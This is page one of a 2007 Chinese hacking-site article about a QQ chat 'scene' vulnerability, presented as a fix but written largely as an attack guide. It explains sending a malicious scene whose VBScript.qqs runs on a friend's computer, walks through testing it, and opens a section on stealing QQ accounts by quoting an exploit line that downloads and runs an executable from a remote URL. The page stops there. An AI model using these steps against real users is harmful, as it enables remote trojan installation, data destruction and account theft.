QQ号码很危险 QQ场景漏洞的破解之法
日期:2007年9月12日 作者: 查看:[大字体 中字体 小字体]-
根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示,中国活跃的IM软件账号已经达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗,你的QQ现在很危险了!
不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。
月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现,不需要有什么高超的技巧,只要懂一点基本的脚本代码编写,就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系统等。于是,地狱之门就被打开了,所有的QQ用户都被恐惧笼罩着。
一、QQ场景漏洞的利用原理解析
聊天场景是QQ软件中的一项基本功能,可以让聊天的双方使用同样的场景,从而拉近聊天用户之间的距离。不过最新的QQ场景漏洞,可能会让大家的QQ有被盗的风险。
该漏洞的利用原理很简单,攻击者向其QQ列表内的用户发送一个恶意构造的场景,场景里面包括图片文件、VBScript.qqs文件和Config.qqs文件,其中VBScript.qqs文件就是编写恶意代码的地方,然后在远程系统中执行即可。
二、QQ场景漏洞的危害有多大
QQ场景漏洞的危害到底多大?重则可能系统崩溃,资料消失;轻则可能QQ被盗,这些后果都是很严重的。更可怕的是,漏洞的利用方法特别简单,不需要什么操作即可实现,会成为大量手痒的菜鸟黑客们的最爱。
添加的脚本代码的作用不同,造成的危害性也会不同。比如,如果是一段文件下载脚本代码的话,那么代码就会自动下载设置的文件并默默地运行。如果下载的是木马后门程序的话,黑客就可以通过木马进行远程控制。如果是一段格式化代码的话,那么磁盘中的文件就会瞬间被清除掉。
小提示:QQ场景漏洞的危害程度判断是参考了标准的次高危害漏洞(百度搜霸远程执行漏洞)和标准的中等危害漏洞(WMP AU文件除零漏洞)。
三、试用QQ场景漏洞首先,将QQ场景漏洞所需的场景文件下载到本地系统,解压后复制到系统中QQ的安装目录X:\Program Files\Tencent\QQ下面,这样在Scene文件夹中就多了一个场景目录。现在我们就可以进行测试操作,不过为了弹出窗口更加有个性化,我们要对场景目录真的脚本文件进行修改。
接着,用文本编辑器打开其中的VBScript.qqs文件,在文件代码中找到MsgBox这个消息函数,该函数后面跟着的就是该场景在执行后弹出的信息内容,这里我们可以将它设置为自己需要弹出的内容信息,比如设置为“电脑报,我的最爱!”(图1)。如果你熟悉VBS脚本,可以设置更有个性的语句。

然后,随便在QQ联系人列表中找一个人,无论对方使用的是QQ还是TM都可以,双击打开其聊天窗口。然后点击工具栏中的“选择音乐场景”按钮,在弹出的窗口中选择打开“我的场景”标签,并且找到一个和场景目录名称相同的场景。这样这个带有VBS脚本的场景,就会自动的下载到远程好友的QQ 中并运行(图2)。
四、如何利用QQ场景漏洞盗QQ
漏洞用熟后,就可以开始盗QQ了。首选下载该漏洞的利用代码,然后进行简单的修改即可。下面就对代码的关键部分进行讲解(图3)。
iLocal = LCase("c:\mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")
- [1] [2] [3] 下一页
-
- QQ号码很危险 QQ场景漏洞的破解之法 相关文章:
- ·解读身份认证技术现实化
- ·解读防火墙日志记录 防范网络攻击
- ·详解Alexa网站流量排名
- ·Vista防火墙导致网络无法访问解决方法
- ·IDC邮件安全网关解决方案提高带宽效率
- ·Linux系统网络配置详细解析
- ·详解服务器集群系统实现方案
- ·BIOS开机自检的中文解释
- ·Vista系统中CHM文档无法打开解决方法
- ·理解ASP.NET中的三层结构
- QQ号码很危险 QQ场景漏洞的破解之法 相关软件
- ·动作解谜《科学试验》游戏试玩
- ·《化解危机4》宣传片
- ·苏联解体亲历记
- ·《周公解梦》V7.85 版 测字算命
- ·中国人民解放军五大主力战史
- ·简明中国人民解放军战史
- ·《微笑娃娃》解密试玩
- ·《死亡暗礁》冒险解谜试玩
- ·解密血腥惊悚的另类职业:《我是法医》
- ·《蒸气军团》冒险解密试玩
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
精品推荐
热点TOP10
- ·QQ密码被盗之谜1:本地破解的奥秘原理和方法
- ·使用QQ注意:这2个文件夹要定时清理!
- ·骗你没商量!QQ相关欺骗大搜罗
- ·修改QQ密码别忘使用“安全模式”
- ·QQ防盗措施及解决异常激活的办法
- ·QQ的黑名单有什么用?
- ·铜墙铁壁!在路由器端彻底封堵QQ聊天
- ·盗QQ号码方法大全
- ·不改密码只转移QQ币
- ·qq场景制作常用操作
- ·QQ2004火影忍者皮肤-雏田
- ·巧用QQ面板获取最新QQ空间代码
- ·几条不错的QQ空间播放器代码
- ·QQ空间如何上传照片
- ·好友无处藏身 揪出隐身QQ好友
- ·聊天必备:QQ超大彩色文字编辑器
- ·暴光恶意网站 杀机四伏的QQ空间互踩联盟
- ·QQ盗号木马盗取帐号与重要信息
- ·登录QQ小心“奥运门票”骗局
- ·菜鸟必读:你的QQ号码、Q币这样被盗
特别推荐
- ·暴光恶意网站 杀机四伏的QQ空间互踩联盟
- ·QQ防盗措施及解决异常激活的办法
- ·QQ的黑名单有什么用?
- ·QQ缘伪装任务管理器进程的查杀
- ·菜鸟必读:你的QQ号码、Q币这样被盗
- ·QQ惊爆危险漏洞:“QQ游戏邀请大盗”
- ·QQ木马:QQ挂马方法大揭密
- ·QQ木马到底怎么做 QQ挂马方法大揭密
- ·新手必须注意 防止QQ密码被破解的技巧
- ·严防个人信息泄漏QQ密码
- ·菜鸟小技巧 准确识别QQ盗号陷阱的方法
- ·不改密码只转移QQ币
- ·腾讯QQ密码防盗十大建议
- ·注意防盗!QQ邮箱今天你上锁了吗?
- ·铜墙铁壁!在路由器端彻底封堵QQ聊天
- ·拒绝威胁 防止QQ密码被盗的十项技巧
- ·常见的几种QQ病毒的特征及其清除方法
- ·再也不怕被盗 用瑞星保护QQ密码安全
- ·手工清除向好友发送信息的QQ尾巴
- ·快速找回QQ密码的新方法
